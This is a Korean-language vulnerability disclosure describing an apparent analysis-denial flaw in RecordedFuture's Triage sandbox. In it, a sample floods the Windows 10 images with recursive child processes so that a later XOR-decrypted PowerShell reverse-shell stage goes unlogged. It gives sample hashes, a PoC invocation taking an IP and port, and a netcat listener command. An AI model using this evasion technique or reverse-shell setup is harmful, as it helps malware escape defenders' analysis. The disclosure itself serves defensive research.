
심각한 취약점 (9.8) - RecordedFuture Triage 동적 분석 엔진은 샘플이 매우 높은 볼륨의 재귀적 프로세스 포크를 생성할 때 악의적인 행위를 기록하지 못할 수 있으며, 이로 인해 일관되지 않거나 누락된 행동 보고서가 발생합니다.
RecordedFuture Triage Sandbox Windows 10 build 2004 및 Windows 10 LTSC 2021은 Windows 동작 분석 엔진에 심각한 취약점을 포함하고 있어, 제출된 악성코드 샘플이 탐지를 회피하고 분석 거부를 유발할 수 있습니다. 이 취약점은 샘플이 재귀적으로 많은 수의 자식 프로세스를 생성하여 높은 로그 볼륨을 발생시키고 시스템 리소스를 고갈시킬 때 발생합니다. 그 결과, PowerShell 실행 및 리버스 셸 활동을 포함한 주요 악성 행위가 기록되거나 보고되지 않을 수 있어 분석가를 오도하고 샌드박스 분석 결과의 무결성과 가용성을 손상시킵니다.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H샘플 vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b)는 RecordedFuture Triage의 Windows 동작 분석 엔진에서 분석 거부 상태를 보여줍니다.
Windows 10 구성에서 실행될 때, 이 샘플은 수천 개의 자식 프로세스를 재귀적으로 생성하여 프로세스 추적 및 로깅 리소스를 고갈시킵니다. 결과적으로 샌드박스는 최소한의 동작 데이터만 보고하고 주요 악성 행위를 기록하지 못합니다.
win10v2004-20250610-enx64104s213s1/10vathos_rev.exe의 지속적인 프로세스 재귀win10ltsc2021-20250619-enx64105s215s1/10vathos_rev.exe의 지속적인 프로세스 재귀두 Windows 10 샌드박스 환경 모두에서, 악성코드가 호스트에서 이러한 동작을 실행했음에도 불구하고 폭발 시험은 예상된 PowerShell 실행 및 리버스 셸 단계를 캡처하지 못했습니다.
샌드박스의 동작 분석 엔진은 재귀적 프로세스 생성으로 인해 포화 상태가 되어 텔레메트리가 잘리거나 누락되었습니다.
이는 분석 거부 취약점을 확인하며, 동작 엔진이 높은 재귀 및 로그 볼륨 하에서 악성 활동을 보고하지 못하여 위음성 및 불완전한 포렌식 출력을 초래합니다.
공개 보고서 참조:
https://tria.ge/250822-qfystshk51
이는 RecordedFuture Triage의 분석 거부 취약점으로, 동적 분석 엔진이 동작 활동을 캡처하거나 보고하지 못하게 할 수 있습니다. 악용 시 공격자는 동작 탐지를 우회하고 불완전하거나 누락된 분석 보고서를 생성할 수 있습니다.
주요 영향
하위 영향
vathos_rev.exe
3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4bdca2fc8f69f6493c7a9c1ce9a68b24549b4688ba4788e34bce47d91b0accc98d33dbf8d2924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b270 KB250822-qfystshk51win10ltsc2021-20250619-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTC250822-qfystshk51win10v2004-20250610-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTC참고: 엔진 빌드 및 내부 버전 세부 정보는 RecordedFuture에서 공개하지 않습니다.
모든 관찰은 RecordedFuture의 Triage 플랫폼(제출250822-qfystshk51)의 재현 가능한 공개 폭발을 기반으로 합니다.
제공된 데모는 매우 높은 프로세스 볼륨과 깊게 중첩된 런타임 활동을 생성하여 분석 거부(DoA) 조건을 재현합니다. 데모는 많은 자식 프로세스를 생성하고 최종 PowerShell 리버스 셸 단계 전에 다중 라운드 XOR 복호화를 수행합니다. 취약한 Triage Windows 10 이미지에서는 최종 페이로드 단계가 기록되지 않거나 잘리지만, 다른 이미지(예: Windows 11)에서는 전체 동작을 캡처합니다.
실행 방법
poc/vathos_demo.exe <IP> <PORT>
지정된 IP/포트에서 리스너(예: nc -lvp 4444)를 시작하여 연결 시도를 관찰하세요. 데모는 매우 많은 수의 프로세스를 생성하고 다중 라운드 XOR 복호화를 수행하여 PowerShell 리버스 셸 단계로 이어집니다. 영향을 받는 Triage 구성에서는 샘플이 호스트에서 실행되더라도 최종 페이로드 단계가 기록되지 않을 수 있습니다.
그림 1 - Triage 개요 대시보드

그림 2 - Windows 10 v2004 동작 보고서 (최소 텔레메트리 / DoA 예)

그림 3 - Windows 10 LTSC 2021 동작 보고서 (최소 텔레메트리 / DoA 예)

그림 4 - Windows 10 LTSC에 기록된 프로세스 예시 (익명 처리, 모든 프로세스가 기록된 것은 아님) — 분석 로그 → 프로세스
